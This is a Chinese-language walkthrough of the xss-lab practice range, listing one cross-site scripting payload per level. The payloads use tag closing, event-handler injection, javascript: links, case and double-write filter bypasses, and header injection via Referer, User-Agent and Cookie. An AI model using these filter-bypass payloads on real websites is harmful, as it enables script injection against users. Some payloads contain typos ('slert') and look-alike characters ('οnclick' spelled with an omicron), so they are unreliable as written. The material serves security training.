目录
xss-lab靶场搭建
在www目录下放入文件xss-lab
xss-lab题目+解答
level1
<script>slert(1)</script>
level2
标签闭合
" οnclick="alert(1)
level3
绕过htmlspecials()
12' οnclick='alert(1)
level4
闭合11" οnclick="alert(1)123" οnclick=alert(1)//
level5
伪协议和标签
11"><a href="javascript:alert(1)">
level6
大小写绕过
123"><sCript>alert(1)</scRipt>
level7
双写绕过123"><scrscriptipt>alert(1)</scrscriptipt>
level8
a标签href伪协议+url编码,url编码会被浏览器自动解码
javascript:alert(1)
编码后为:
javascript:alert(1)
level9
编码+字符串
javascript:alert('http://')
level10
将hidden标签覆盖?t_sort=1" οnmοuseοver="alert(1)" type='text'
level11
Referer,覆盖hidden标签111" οnmοuseοver='alert(1)' type='text'
需要在level10进行跳转
使用brup抓包
修改Referer
修改完后level11完成
level12
user-agent,覆盖hidden标签111" οnmοuseοver='alert(1)' type='text'
使用brup抓包
修改User-Agent
成功通过level12
level13
cookie,覆盖hidden标签111" οnmοuseοver='alert(1)' type='text'
使用brup抓包
修改cookie
成功通过level13
level16
将script替换为空格,然后所有空格替换为
解决方法,使用其他不含script的标签以及替代空格的方式
<img%0asrc="1"%0aοnerrοr=alert(1)>